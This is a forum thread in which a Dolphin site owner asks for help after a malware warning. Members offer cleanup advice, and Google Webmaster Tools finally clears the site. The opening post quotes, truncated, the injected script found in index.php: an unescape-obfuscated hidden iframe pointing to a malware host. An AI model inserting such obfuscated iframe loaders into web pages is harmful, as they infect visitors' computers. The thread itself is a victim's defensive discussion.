So when I went to check my site today, I got to see that ugly red page instead that said:
Warning: Visiting this site may harm your computer!
The website at www.ustillup.com contains elements from the site z2z12.co.cc, which appear to host malware - software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer. ...
I also noticed a strange white mark at the bottom of my black template. I checked out my source and sure enough at the end of my website was this:
(I shortened it in case anybody gets scared)
<script type="text/javascript">document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%7a%32%7a%31%32%2e%63%6f%2e%63%63%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%33%27%20%77%69%64%74%68%3d%27%31%27%20%68%65%69%67%68%74%3d%27%31%27%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%27%30%27%3e%3c%2f%69%66%72%61%6d%65....
So I found this added code in my index.php page and removed it. Now the red page is no longer showing.
However, I have a few questions:
a. How did this happen?
b. How can I determine if there is more malicious code in my website?
c. What's my next step?
Any advice would be greatly appreciated!
No Signature at this time. |
I recommend you change your hosting account-related passwords, since it's more than likely that's how this occurred. If you can, check your server logs for any files that were modified around the time you believe this occurred. BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin |
You still have a problem..
I was in your chat yesterday..
today, see picture
ManOfTeal.COM a Proud UNA site, six years running strong! |
Ya, my site is definitely infected still. This is crazy!
I've gone in and changed my WHM password.
I've checked my own computer and found no virus or malware.
I will now check what files were changed ...
I notice on my join page there is still a strange thing at the bottom left.
You can check it out for yourself if you dare http://www.ustillup.com/join
No Signature at this time. |
Lovely! I can't change my Dolphin admin password. It keeps saying "Wrong New Password". No Signature at this time. |
@JasonVan - have you upgraded to 7.0.4 yet? Just curious to know in case there is a way in due to the update. |
scary are all dolphin users at risk?? Damn i can't wait for Dolphin10 to be released, Its gonna be awesome :) |
If you can't change the current admin password then copy a different encrypted password from an older database back up and replace the current encrypted password with it.
Better to have an old password that a hacker won't know than a current one they do. Just make sure you keep a copy of the current encrypted one in case you need to go back to it.
|
I actually updated to 7.0.4 yesterday. No Signature at this time. |
|
Ya, my site is definitely infected still. This is crazy!
I've gone in and changed my WHM password.
I've checked my own computer and found no virus or malware.
I will now check what files were changed ...
I notice on my join page there is still a strange thing at the bottom left.
You can check it out for yourself if you dare http://www.ustillup.com/join
Well I did check your join page... I have duplicated this photo b4.
This has happened to my site when the new "cache" are on and not configured on your server ..
I was able to get some sites back by manually editing the database. I found working on cache setting , have an "administration" window open in one browser and the "viewing" of the site in another browser window. If you set a change a cache setting you have the open admin window to change the settings back to "Filehtml"
make any sense, I just woke from a nap..
ManOfTeal.COM a Proud UNA site, six years running strong! |
Wow!
This is sure a great way to kill a website!
I've been going through my site all day now looking for any removing malicious code.
And I submitted a ticket to my hosting company about 8 hours ago and still haven't had a response, other than they will look into it.
I guess paying $300/month for a server doesn't guarantee you any special favors.
Well, the joke will be on them, cause if this continues I won't be able to afford their server. He he.
No Signature at this time. |
Update:
Just in case you were concerned...
Thank goodness for Google Webmaster Tools!
Webmaster tools was able to identify all the malicious code. After removing everything they found, I submitted my site for review. The review came back clean and all the warnings have now been removed. Yeah!
Now I just need to cross my fingers that this doesn't happen again.
No Signature at this time. |
Thank goodness for Google Webmaster Tools!
My bestest friend too. :P
I know "bestest" is not a word, but in the "urban dictionary" this applies. lol
ManOfTeal.COM a Proud UNA site, six years running strong! |
Thank goodness for Google Webmaster Tools!
My bestest friend too. :P
I know "bestest" is not a word, but in the "urban dictionary" this applies. lol
The Urban Dictionary is not an acceptable dictionary. I deduct twelve points from your score.
BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin |
Thank goodness for Google Webmaster Tools!
My bestest friend too. :P
I know "bestest" is not a word, but in the "urban dictionary" this applies. lol
The Urban Dictionary is not an acceptable dictionary. I deduct twelve points from your score.
Aw that's not fair.. now I'm for sure in the at the bottom again! 
Please mister moderator, go easy..
ManOfTeal.COM a Proud UNA site, six years running strong! |
